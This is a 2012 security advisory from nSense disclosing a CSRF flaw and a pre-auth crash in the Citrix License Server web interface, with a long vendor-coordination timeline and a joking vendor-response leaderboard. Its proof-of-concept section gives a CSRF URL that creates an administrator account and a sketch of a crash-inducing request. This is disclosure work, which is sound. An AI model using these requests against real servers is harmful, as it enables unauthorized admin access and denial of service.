Citrix License Server 11.6.1 Build 10007 CSRF

2012-03-16T00:00:00
ID PACKETSTORM:110867
Type packetstorm
Reporter Knud
Modified 2012-03-16T00:00:00

Description

                                        
                                            ` nSense Vulnerability Research Security Advisory NSENSE-2012-001  
---------------------------------------------------------------  
  
Affected Vendor: Citrix  
Affected Product: Citrix License Server 11.6.1 build 10007  
Impact: DoS, CSRF  
Vendor response: New version released  
CVE: N/A  
Credit: Rune & Knud aka Smurfbuddies / nSense  
Release date: 15 Mar 2012  
Vendor link: http://support.citrix.com/article/CTX128167  
  
Technical details  
---------------------------------------------------------------  
  
The license server web management interface contains two  
vulnerabilities:  
1) Denial-of-Service vulnerability which allows an  
unauthenticated attacker to crash the license server.  
  
2) Cross Site Request Forgery vulnerability which enables an  
attacker to create additional users in the management  
interface, IF a logged-in administrator can be lured to  
visit a link pointing to the vulnerable functionality.  
  
Timeline:  
2010-12-20 Sent an e-mail to secure@citrix.com with  
vulnerability details  
2010-12-20 Citrix acknowledged the submission and opened a case  
2011-01-31 Requested a status update  
2011-01-31 Citrix replied, stated vulnerabilities are in a  
third party component  
2011-01-31 Requested more detailed information about the patch  
schedule  
2011-02-14 Requested a status update  
2011-02-14 Citrix replied  
2011-02-16 Requested more detailed information to justify  
deadline extension  
2011-02-17 Citrix replied  
2011-02-17 Requested information about the bulletin  
2011-02-17 Citrix replied  
2011-02-23 Citrix delivered bulletin information  
2011-02-23 Requested information regarding the bulletin  
2011-02-23 Citrix replied  
2011-02-24 Supplied Citrix information about nSense disclosure  
policy  
2011-03-20 Requested information about the patch schedule  
2011-03-29 Requested a status update  
2011-03-30 Enquired whether e-mails had been received  
2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from  
support@citrix.com  
2011-03-31 Citrix replied  
2011-03-31 Acknowledged continuing coordination  
2011-04-19 Requested a status update  
2011-05-25 Requested a status update  
2011-06-15 Requested a status update  
2011-06-16 Citrix replied  
2011-07-17 Requested a status update  
2011-08-17 Requested a status update  
2011-08-17 Citrix replied  
2011-10-12 Requested a status update  
2011-10-21 Requested a status update  
2011-10-21 Citrix replied. Still validating patches,  
still no release date set  
2011-11-18 Requested a status update. Sent timeline to  
Citrix  
2011-12-05 Citrix replied. Targeting February 2012.  
Citrix promised to send new information if  
the planned schedule changes  
2012-02-29 February 2012 officially over. No news  
from Citrix  
2012-03-02 Citrix informed they are preparing a release  
2012-03-05 Replied and specified credit information  
2012-03-13 Citrix replied. Sent knowledge base link  
2012-03-15 Advisory released. Old nSense vulnerability  
coordination policy officially terminated.  
  
Proof-of-Concept:  
http://citrix-license-server-ip:8082/users?licenseTab=&selected  
=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&con  
firm=xsrf&accountType=admin&originalAccountType=&Create=Save  
(Administrator CSRF)  
  
http://citrix-license-server-ip:8082/dashboard?  
<something long here>=2 (pre auth DoS, crashes lmadmin.exe)  
  
Note! The lmadmin crash was _not_ analyzed in any way.  
  
Additional information  
----------------------  
As our current vulnerability coordination policy has come to  
an end, we wanted to share with you some of the lap times from  
vendors who have gone through our test track.  
  
Vendor with a reasonably-priced vulnerability  
  
Leaderboard  
-----------  
VeryPDF: 1 week  
Nullsoft: 2 weeks  
Adobe: 2 months  
Cisco: 2.5 months  
SAP: 2.5 months  
Adobe: 3 months  
Teamspeak: 3 months / no patch (CERT-FI)  
Azeotech: 3.5 months (ICS-CERT)  
Angelina Jolie*: 5 months (ICS-CERT)  
Apple: 6 months  
Novell: 8 months  
Citrix: 15 months  
* Bill Bailey, or was it Scadatec?  
  
And on this bombshell, it is time to end. Good night!  
---------------------------------------------------------------  
http://www.nsense.dk http://www.nsense.fi http://www.nsense.pl  
  
`